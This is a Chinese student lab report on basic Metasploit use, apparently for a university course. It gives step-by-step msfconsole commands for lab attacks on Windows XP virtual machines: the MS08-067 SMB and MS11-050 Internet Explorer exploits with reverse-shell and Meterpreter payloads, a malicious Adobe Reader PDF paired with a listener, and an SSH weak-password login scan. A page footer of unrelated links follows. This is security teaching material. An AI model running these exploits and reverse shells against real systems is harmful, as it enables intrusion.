《网络攻防》 MSF基础应用
20145224陈颢文 《网络攻防》MSF基础应用
基础问题回答
用自己的话解释什么是exploit,payload,encode:
- exploit:攻击手段,是能使攻击武器(payload)的方法;
- payload:攻击武器,真正具有攻击性的代码;
- encode:编码方式,根据payload将要被放置的环境选择合适的编码方式,使它能够正常的运行,如:消除所有的“0x00”;
实验总结与体会
这次实验做的我好心累,也好欣慰,心累是因为想要成功的做出实验实在是太困难了,有个好靶机是关键;欣慰是感觉到我们正在使用的系统也并没有之前想象中的那么不堪,只要及时打补丁,还是能防住不少“小毛贼”的。
实践过程记录
MS08_067漏洞渗透攻击(主动攻击)
- 使用
winXPenSP3
为靶机; - 首先得确保两台机子在同一网段内,如果不在就手动修改;
- 终端中打开
msfconsole
,输入命令use exploit/windows/smb/ms08_067_netapi
,使用MS08_067漏洞模块; - 使用命令
set payload generic/shell_reverse_tcp
指定攻击有效载荷; - 设置具体参数:
set LHOST Kali的IP
和set RHOST Windows的IP
; show options
查看所有参数是否设置正确,最后下令发起攻击exploit
:
MS11050安全漏洞(IE浏览器渗透攻击)
- 使用
免考xp sp3
为靶机; - 首先得确保两台机子在同一网段内,如果不在就手动修改;
- 终端中打开
msfconsole
,输入命令use windows/browser/ms11_050_mshtml_cobjectelement
,使用MS11050漏洞模块; - 使用命令
set payload windows/meterpreter/reverse_tcp
指定攻击有效载荷; - 设置具体参数:
set LHOST Kali的IP
、set LPORT 自定义端口号
和set URIPATH 自定义域名
; show options
查看所有参数是否设置正确,最后下令发起攻击exploit
:
- 复制
local IP
,在靶机上使用IE浏览器进行访问:
成功是成功了,但是结果和我预想的不太一样?!
我猜啊,也许是我Kali的版本不一样,所以payload
的功能也不同了~
Adobe阅读器渗透攻击(针对客户端)
- 使用
winxpAttaker
为靶机; - 首先得确保两台机子在同一网段内,如果不在就手动修改;
- 终端中打开
msfconsole
,输入命令use exploit/windows/fileformat/adobe_cooltype_sing
,使用Adobe阅读器漏洞模块; - 使用命令
set payload windows/meterpreter/reverse_tcp
指定攻击有效载荷; - 设置具体参数:
set FILENAME 自定义文件名.pdf
、set LHOST Kali的IP
和set LPORT 自定义端口号
; show options
查看所有参数是否设置正确,最后输入exploit
,生成pdf文件,并可以看到pdf所在文件夹,将pdf复制到靶机里;
什么?!粘贴不上去!!!那就快去把靶机里的虚拟机增强工具更新一下吧,别告诉我你不会!- 使用
back
指令返回上一级菜单,再设置msf的监听:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 主机IP
set LPORT 端口号
show options(检查所有数据是否正确)
exploit
- 最后在靶机中打开刚刚的PDF文件即可(时间略长);
成功应用任何一个辅助模块
- 显示所有的辅助模块
show auxiliary
(甚用,谁试谁知道); - 通过上面三个实验不难看出msf的使用还是有套路可循的:
进入模块
->指定荷载
->设置参数
->发动攻击
; - 这次我尝试使用的是一个扫描SSH弱口令的一个辅助工具
ssh_login
,模块路径:auxiliary/scanner/ssh/ssh_login; - 终端中打开
msfconsole
,输入命令use auxiliary/scanner/ssh/ssh_login
,使用ssh_login模块; - 使用
show options
查看所有参数,其中Required
一栏中为“yes”的是必填参数,理论上把他们填好了这个模块也就能正常的使用了:
show options
查看所有参数是否设置正确,最后输入exploit
开始扫描:
成功登陆到一个用户名为“root”、密码为“123456”的SSH账户!
《网络攻防》 MSF基础应用的更多相关文章
- 20145306 张文锦 网络攻防 web基础
20145306 网络攻防 web基础 实验内容 WebServer:掌握Apache启停配置修改(如监听端口)前端编程:熟悉HTML+JavaScript.了解表单的概念编写不同的HTML网页,放入 ...
- 2018-2019-2 20165206 网络攻防技术 Exp5 MSF基础应用
- 2018-2019-2 20165206<网络攻防技术>Exp5 MSF基础应用 - 实验任务 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如 ...
- 2018-2019-2 20165336《网络攻防技术》Exp5 MSF基础应用
2018-2019-2 20165336<网络攻防技术>Exp5 MSF基础应用 一.攻击实例 主动攻击的实践 ms08_067(成功) payload/generic/shell_rev ...
- 2018-2019-2 20165312《网络攻防技术》Exp5 MSF基础应用
2018-2019-2 20165312<网络攻防技术>Exp5 MSF基础应用 目录 一.知识点总结 二.攻击实例 主动攻击的实践 ms08_067 payload/generic/sh ...
- 2018-2019-2 20165315《网络攻防技术》Exp5 MSF基础应用
2018-2019-2 20165315<网络攻防技术>Exp5 MSF基础应用 目录 一.实验内容 二.实验步骤 1.一个主动攻击实践 ms08_067(成功) 2.一个针对浏览器的攻击 ...
- 20145236《网络攻防》Exp5 MSF基础应用
20145236<网络攻防>Exp5 MSF基础应用 一.基础问题回答 解释exploit,payload,encode是什么: exploit就是负责负载有用代码的交通工具,先通过exp ...
- 20155201 网络攻防技术 实验五 MSF基础应用
20155201 网络攻防技术 实验五 MSF基础应用 一.实践内容 一个主动攻击实践,如ms08_067 一个针对浏览器的攻击,如ms11_050 一个针对客户端的攻击,如Adobe 成功应用任何一 ...
- 20155226《网络攻防》 Exp5 MSF基础应用
20155226<网络攻防> Exp5 MSF基础应用 基础问题回答 1.用自己的话解释什么是exploit,payload,encode? exploit : Exploit的英文意思就 ...
- 20155235 《网络攻防》 实验五 MSF基础应用
20155235 <网络攻防> 实验五 MSF基础应用 实验内容 一个主动攻击实践,如ms08_067; (1分) 一个针对浏览器的攻击,如ms11_050:(1分) 一个针对客户端的攻击 ...
- 20155301 《网络攻防》 Exp5 MSF基础应用
20155301 <网络攻防> Exp5 MSF基础应用 基础问题 1.用自己的话解释什么是exploit,payload,encode 答:exploit就是利用一些工具的,用来收集目标 ...
随机推荐
- unity 打开文件夹并鼠标选中某文件
System.Diagnostics.Process p = new System.Diagnostics.Process(); p.StartInfo.FileName = "explor ...
- 【SR】MAP
MAP:最大后验概率(Maximum a posteriori) 估计方法根据经验数据获得对难以观察的量的点估计.它与最大似然估计中的 Fisher方法有密切关系, 但是它使用了一个增大的优化目标,这 ...
- 尼康D90多点对焦
11点对焦 上市时间 2008 类型 单反数码相机 对焦方式 单区域AF:在选择区域内只对焦于目标可以从11个AF点传感器中的任意一个中选择 动态区域AF:对焦于选择区域的目标上,如果目标离开原来位置 ...
- 面试心得与总结—BAT、网易、蘑菇街 - ImportNew
1. 九种基本数据类型的大小,以及他们的封装类. 2. Switch能否用string做参数? 3. equals与==的区别. 4. Object有哪些公用方法? 5. Java的四种引用,强弱软虚 ...
- 如何阅读不同格式的Ubuntu/Linux帮助文档
Ubuntu和Linux的帮助文档有各种各样的格式,下面简单说下如何阅读这些帮助文档. 1)通过man命令阅读软件或命令的manual page.例如阅读man命令的manual页面可使用如下命令: ...
- vs2017 git 操作重置、还原、挑拣对比
工具 :vs2017 git 操作 背景:本地与远程分支同步 操作:还原.挑拣.重置--hard .重置--mixed 分支:本地1.本地2.origin\本地1 基本操作 1:分支:本地2-ad ...
- VC的CListCtrl控件
1. CListCtrl 样式及设置 2. 扩展样式设置 3. 数据插入 4. 一直选中Item 5. 选中和取消选中Item 6. 得到CListCtrl中所有行的checkbox的状态 7. 得到 ...
- <2014 08 29> MATLAB的软件结构与模块、工具箱简示
MATLAB的系统结构:三个层次.九个部分 ----------------------------------- 一.基础层 是整个系统的基础,核心内容是MATLAB部分. 1.软件主包MATLAB ...
- 手动拼写出来的sp_who结果集
SELECT SPID = er.session_id ,STATUS = ses.STATUS ,[Login] = ses.login_name ,Host = ses.host_name ...
- Python__return
return的注意点: return返回的值, 没有任何类型限制 return是函数结束的标志,函数内可以写多个return,但执行一次,函数就立刻结束,并把return后的值作为本次调用的返回值.